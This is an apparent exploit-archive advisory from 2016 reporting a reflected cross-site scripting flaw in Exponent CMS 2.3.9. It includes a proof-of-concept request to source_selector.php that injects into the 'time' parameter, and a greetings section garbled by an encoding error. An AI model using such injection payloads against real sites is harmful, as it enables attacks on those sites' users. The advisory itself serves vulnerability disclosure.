Home / exploitsPDF  

Exponent CMS 2.3.9 Cross Site Scripting

Posted on 29 September 2016

======================================================================== | # Title : Exponent CMS versions 2.3.9 XSS vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Tested on : windows 8.1 FranASSais V.(Pro) | # Version : 2.3.9 | # Vendor : https://sourceforge.net/projects/exponentcms/files/exponent-2.3.9.zip/download | # Dork : n/a ======================================================================== poc : This vulnerability affects :/source_selector.php. Attack details : URL encoded GET input time was set to 1485925200_947776'():;988077 The input is reflected inside <script> tag between single quotes. poc : /source_selector.php?action=showall&module=event&src=@random48e7cc857e641&time=1485925200_947776'():;988077 Greetz : aua'>>a'1/2a'1/2a'dega'deg aua'degaua'degau a'>>a'*a'*auaua'>>------au-auau-a'deg a'degaua'degauPSaua'3a'>>au-------- aua'degauau!a'>>auau aua'degauaua'*oauaua'degau ------ | jericho * Larry W. Cashdollar * moncet-1 * achraf.tn | | ===================== pa'degaua'1/2a'>>au auauoauau aua'>>auauauauauauC/ =============================

 

TOP